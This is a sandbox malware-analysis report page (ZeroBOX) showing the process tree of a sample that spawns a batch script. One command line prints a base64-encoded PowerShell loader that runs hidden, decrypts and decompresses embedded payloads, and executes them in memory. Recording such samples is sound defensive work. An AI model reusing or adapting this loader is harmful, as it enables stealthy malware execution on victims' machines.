popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • awpH6iP7gCYM.exe "C:\Users\test22\AppData\Local\Temp\awpH6iP7gCYM.exe"

    2564

    • cmd.exe "cmd.exe" /C C:\Users\test22\AppData\Local\Temp\bat.bat

      2636

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\bat.bat

        2752

        • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Local\Temp\bat.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gUWpSQXUoJFNYSkJIKXskT2VIdGo9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JE9lSHRqLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskT2VIdGouUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRPZUh0ai5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVisreVNyUEs2OWt5V2hicm9IZ0Y3enkyQk5uYXNKdGNtUUdrV01XSGpWcz0nKTskT2VIdGouSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnQ2pRL2RmQ2c0WGRDSlRaOFZjaGJRdz09Jyk7JHhUdExzPSRPZUh0ai5DcmVhdGVEZWNyeXB0b3IoKTskUklkbk89JHhUdExzLlRyYW5zZm9ybUZpbmFsQmxvY2soJFNYSkJILDAsJFNYSkJILkxlbmd0aCk7JHhUdExzLkRpc3Bvc2UoKTskT2VIdGouRGlzcG9zZSgpOyRSSWRuTzt9ZnVuY3Rpb24gSk55ZHIoJFNYSkJIKXskT3pKckM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkU1hKQkgpOyRiSmxvYT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JG14Q3VuPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJE96SnJDLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbXhDdW4uQ29weVRvKCRiSmxvYSk7JG14Q3VuLkRpc3Bvc2UoKTskT3pKckMuRGlzcG9zZSgpOyRiSmxvYS5EaXNwb3NlKCk7JGJKbG9hLlRvQXJyYXkoKTt9JHFHdU16PVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskQU9Tdm89Sk55ZHIgKFFqUkF1IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJHFHdU16LCA1KS5TdWJzdHJpbmcoMikpKSk7JE93V1haPUpOeWRyIChRalJBdSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRxR3VNeiwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kT3dXWFopLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJEFPU3ZvKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "

          2880

        • powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          2920

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf